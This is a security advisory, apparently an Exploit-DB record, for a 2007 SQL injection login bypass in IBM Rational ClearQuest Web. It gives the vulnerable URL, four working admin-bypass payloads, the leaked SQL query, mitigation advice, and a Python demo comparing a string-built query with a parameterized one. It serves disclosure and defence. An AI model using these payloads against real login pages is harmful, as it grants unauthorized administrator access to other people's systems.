Vendor: IBM Rational ClearQuest Web
By: SecureState (sasquatch - swhite@securestate.com, rel1k - dkennedy@securestate.com)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: IBM Rational ClearQuest Web
Affected Version From: 7.0.0.0-IFIX02
Affected Version To: 7.0.0.1
Patch Exists: NO
CPE: a:ibm:rational_clearquest_web:7.0.0.0-IFIX02
Platforms Tested: Not provided
Year: 2007

IBM Rational ClearQuest Web Login Bypass (SQL Injection)

The 'username' parameter of the login request is pasted unescaped into the SQL statement that looks up the account, so a value such as ' OR login_name LIKE '%admin%'-- closes the string literal, appends an OR condition that matches the admin account, and comments out the rest of the query. The lookup then returns the admin row and the attacker is logged in as that user. The application also echoes the complete SQL statement in its error message, which exposes the query structure and the column names to anyone probing the field.

Mitigation:

To mitigate this vulnerability, the username must be passed to the database as a bound parameter (prepared statement) rather than concatenated into the query text; input validation on the login form is a useful second layer but not a substitute. The verbose database error that echoes the full SQL statement should also be suppressed, since it hands an attacker the exact query to target. No vendor patch was available at the time of this advisory, so until one is applied the login endpoint should be exposed only to trusted networks and login requests whose username contains a quote character should be logged and investigated.

Exploit-DB raw data:

+==============================================================+
+   IBM Rational ClearQuest Web Login Bypass (SQL Injection)   +
+==============================================================+

DISCOVERED BY:
==============
SecureState
  sasquatch - swhite@securestate.com
  rel1k - dkennedy@securestate.com

HOMEPAGE:
=========
www.securestate.com


AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...


SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMANAMEHERE&userDb=DATABASENAMEHERE

Log in as "admin":
==================
' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...

Confirmed against:
==================
version 7.0.0.1        Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630

FULL SQL Statement is spit back in error message:
=================================================
SELECT
   master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
   master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
   master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
   master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
   master_users
WHERE
   login_name = 'INJECTION GOES HERE
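
The following is an added example, not part of the SecureState advisory and not ClearQuest's own code. It rebuilds the WHERE clause in the shape of the leaked statement above (the application supplies the opening quote and appends the raw username) against a constructed in-memory SQLite table, runs the four advisory payloads through that string-built lookup, and runs the same payloads through the parameterized lookup recommended in the mitigation section. The table, the column subset, the sample accounts and the hashed-password placeholders are assumptions for the demonstration; the real backend is the ClearQuest master database.

```python
import sqlite3

# Constructed sample accounts (not from the advisory). Column order follows the
# CREATE TABLE below, a subset of the columns named in the leaked statement.
SAMPLE_USERS = [
    (1, "admin", "0123456789abcdef", "admin@example.test", "Administrator", 1, 1),
    (2, "jdoe", "fedcba9876543210", "jdoe@example.test", "John Doe", 1, 0),
]

# The login-bypass payloads listed in the advisory, verbatim.
ADVISORY_PAYLOADS = [
    "' OR login_name LIKE '%admin%'--",
    "' OR login_name LIKE 'admin%'--",
    "' OR LOWER(login_name) LIKE '%admin%'--",
    "' OR LOWER(login_name) LIKE 'admin%'--",
]


def make_db():
    """In-memory SQLite stand-in for the master database (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE master_users ("
        "master_dbid INTEGER PRIMARY KEY, login_name TEXT, encrypted_password TEXT, "
        "email TEXT, fullname TEXT, is_active INTEGER, is_superuser INTEGER)"
    )
    conn.executemany("INSERT INTO master_users VALUES (?, ?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Builds the WHERE clause the way the leaked statement shows: the opening
    quote comes from the application and the raw username is appended, so a
    quote inside the value ends the literal and the rest is parsed as SQL.
    Returns the login names the query matched."""
    sql = (
        "SELECT master_dbid, login_name, encrypted_password, is_superuser "
        "FROM master_users WHERE login_name = '" + username + "'"
    )
    return [row[1] for row in conn.execute(sql).fetchall()]


def lookup_parameterized(conn, username):
    """Hardened form: the username is bound as a parameter and is only ever
    compared as data, so the same payload matches no account."""
    sql = (
        "SELECT master_dbid, login_name, encrypted_password, is_superuser "
        "FROM master_users WHERE login_name = ?"
    )
    return [row[1] for row in conn.execute(sql, (username,)).fetchall()]


def bypass_results(conn, lookup):
    """Runs every advisory payload through one lookup function and maps each
    payload to the login names it matched."""
    return {payload: lookup(conn, payload) for payload in ADVISORY_PAYLOADS}


if __name__ == "__main__":
    db = make_db()
    for payload, logins in bypass_results(db, lookup_vulnerable).items():
        print("vulnerable    %-42s -> %s" % (payload, logins))
    for payload, logins in bypass_results(db, lookup_parameterized).items():
        print("parameterized %-42s -> %s" % (payload, logins))
```

Each payload returns only the admin row from the concatenated query, which is the row the login code then treats as the authenticated user; the parameterized query returns nothing for all four while still resolving a legitimate name such as jdoe. The `--` at the end of every payload is what swallows the application's closing quote, which is why the leaked statement, ending in an unterminated literal, is enough to craft a working payload.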

# milw0rm.com [2007-08-14]